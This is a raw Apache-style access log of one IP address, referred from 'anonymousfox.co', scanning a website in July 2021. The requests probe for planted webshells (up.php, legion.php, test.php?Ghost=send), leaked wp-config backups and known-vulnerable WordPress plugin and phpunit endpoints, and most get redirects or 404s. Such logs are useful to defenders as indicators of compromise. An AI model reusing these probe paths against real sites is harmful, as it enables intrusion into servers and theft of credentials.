212.192.241.205 - - [20/Jul/2021:18:11:27 -0400] "GET /wp-1ogin_bak.php HTTP/1.1" 301 529 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:11:40 -0400] "GET /wp-1ogin_bak.php HTTP/1.1" 301 5154 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:12:16 -0400] "GET /wp-includes/fonts/css.php HTTP/1.1" 301 547 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:12:53 -0400] "GET /wp-includes/css/css.php HTTP/1.1" 301 543 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:13:18 -0400] "GET /old-index.php HTTP/1.1" 301 523 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:13:40 -0400] "GET /old-index.php HTTP/1.1" 301 5148 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:14:02 -0400] "GET /old-index.php HTTP/1.1" 404 43939 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:14:31 -0400] "GET /config.bak.php HTTP/1.1" 301 525 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:15:03 -0400] "GET /config.bak.php HTTP/1.1" 301 5150 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:15:14 -0400] "GET /config.bak.php HTTP/1.1" 404 43942 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:15:31 -0400] "GET /wp-admin/config.bak.php HTTP/1.1" 301 543 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:15:38 -0400] "GET /wp-admin/config.bak.php HTTP/1.1" 301 5168 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:15:48 -0400] "GET /wp-admin/config.bak.php HTTP/1.1" 404 43972 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:16:30 -0400] "GET /wp-content/config.bak.php HTTP/1.1" 301 547 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:17:05 -0400] "GET /wp-includes/config.bak.php HTTP/1.1" 301 549 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:18:03 -0400] "GET /wp-content/themes/config.bak.php HTTP/1.1" 301 561 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:18:33 -0400] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 301 563 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:18:56 -0400] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 301 5188 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:19:27 -0400] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 404 44005 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:19:58 -0400] "POST /wp-includes/css/wp-config.php HTTP/1.1" 301 5180 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:20:11 -0400] "GET /wp-includes/css/wp-config.php HTTP/1.1" 404 43993 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:20:28 -0400] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 301 555 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:20:38 -0400] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 301 5180 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:21:48 -0400] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 301 567 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:22:16 -0400] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 301 5192 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:22:48 -0400] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 404 44008 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:23:17 -0400] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 301 581 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:23:38 -0400] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 301 5206 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:24:41 -0400] "GET /haders.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:25:33 -0400] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 301 617 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:25:46 -0400] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 301 5242 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:26:03 -0400] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 404 44068 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:26:48 -0400] "GET /legion.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:27:03 -0400] "GET /legion.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:27:11 -0400] "GET /legion.php HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:28:15 -0400] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 301 573 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:29:25 -0400] "GET /wp-includes/lfx.php HTTP/1.1" 301 535 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:29:53 -0400] "GET /wp-includes/lfx.php HTTP/1.1" 301 5160 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:30:06 -0400] "GET /wp-includes/lfx.php HTTP/1.1" 404 43960 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:30:20 -0400] "GET /wp-includes/small.php HTTP/1.1" 301 539 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:30:46 -0400] "GET /wp-includes/small.php HTTP/1.1" 301 5164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:31:00 -0400] "GET /wp-includes/small.php HTTP/1.1" 404 43966 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:31:53 -0400] "GET /up.php HTTP/1.1" 301 509 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:32:09 -0400] "GET /up.php HTTP/1.1" 301 5134 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:32:54 -0400] "GET /upload.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:33:23 -0400] "GET /upload.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:33:57 -0400] "GET /upload.php HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:34:53 -0400] "GET /test.php?Ghost=send HTTP/1.1" 301 535 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:35:05 -0400] "GET /test.php?Ghost=send HTTP/1.1" 301 5160 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:35:21 -0400] "GET /test.php?Ghost=send HTTP/1.1" 200 4985 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:35:33 -0400] "GET /wp-content/langar.php HTTP/1.1" 301 539 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:36:53 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 597 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:37:14 -0400] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 301 637 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:37:51 -0400] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 301 5262 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:38:06 -0400] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 404 44122 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:38:19 -0400] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 301 609 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:38:45 -0400] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 301 5234 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:39:07 -0400] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 404 44083 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"